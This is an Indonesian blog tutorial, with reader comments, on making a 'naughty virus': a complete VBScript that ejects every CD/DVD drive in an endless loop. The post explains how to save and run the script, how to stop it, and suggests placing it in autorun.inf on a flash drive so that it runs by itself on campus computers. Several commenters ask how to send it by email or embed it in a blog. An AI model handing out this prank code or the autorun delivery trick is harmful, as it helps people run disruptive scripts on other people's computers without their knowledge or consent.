Cara Mudah Membuat Virus Nakal

Cara Membuat Virus Nakal . selarang kita coba iseng iseng ya, mengenai bagaimana cara mudah dan keren membuat virus nakal di komputer, berikut trik nya dari berry blog :

Caranya: Buka notepad dan masukkan code berikut:

Set ilikepies = CreateObject("WMPlayer.OCX.7")
Set ilikepie = ilikepies.cdromCollection
if ilikepie.Count >=1 then
do
For ilikepiesalot=0 to ilikepie.COunt -1
ilikepie.Item(ilikepiesalot).Eject
Next ' cdrom
For ilikepiesalot=0 to ilikepie.COunt -1
ilikepie.Item(ilikepiesalot).Eject
Next ' cdrom
loop
End If

Simpanlah file dengan ekstensi file iseng.vbs atau apapun
nama kesukaan asalkan pastikan ekstensinya .vbs, dan jalankan filenya (Klik 2x), perhatikan CD/DVD ROM akan terbuka/tertutup dengan sendirinya
tanpa henti.


Salah satu cara menghentikan aksi Virus Nakal ini ialah dengan menekan tombol CRTL+ALT+DEL dan matikan proses wscripts.exe, Kalo mau keren lagi, masukkan ke file autorun.inf di flashdisk sobat, jadi setiap kamu colokin ke kompie kampus, maka akan otomatis dijalankan Virus Nakal ini..

bagaimana ? hehhe, jangan keseringan ya, baik demikian tips trik atau tutorial cara membuat virus yang nakal di komputer dari berry blog , semoga bermanfaat.

sumber : doc fb bukan pc+

Like THIS :
Share this article to: Facebook Twitter Google+ Linkedin Technorati Digg

Jika Anda menyukai Artikel di blog ini, Silahkan berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit.


14 komentar untuk "Cara Mudah Membuat Virus Nakal"

iklansarana mengatakan...

he..he... info bagus bagi yang suka iseng....

Hendra Kurniawan mengatakan...

Boleh juga tuh di coba!

LenteraMer@h mengatakan...

kk AKu Mau yg Bisa Dikirim Lewt EMail
Ad gk kk Trimakasih Mhon di blez Ya kk :)

Anonim mengatakan...

kk aku takut kalau nyoba trus malah nggak bisa di balikin...ini bisa dibalikin kan?

Ganes Putra mengatakan...

thanks for share.
visit http://www.bocahdoko.blogspot.com/

Antok Railfans mengatakan...

hebat...., cdroom nya kebuka truss
hahaha...

Ihsan_TKJ(Bengkayang) mengatakan...

lucu laa nih virus nyaa..

JOKOWI AHOK mengatakan...

kalau buat di sisipkan ke dalam blog gimana cara gan?

icank mengatakan...

masak sih???
wah ini harus di coba...
thanks..

Anonim mengatakan...

ini di copy semua gan?

Anonim mengatakan...

gan kalo disimpen bukan .bat atau .vbs tapi .txt ga akan berpengaruh kan gan..?

pemeriharaan mesin mengatakan...

keren

Arminapen Gayo mengatakan...

entar ane coba gan..

luthfi sujudi mengatakan...

kalo ngirimnya gan?

Proudly by UIN SUSKA RIAU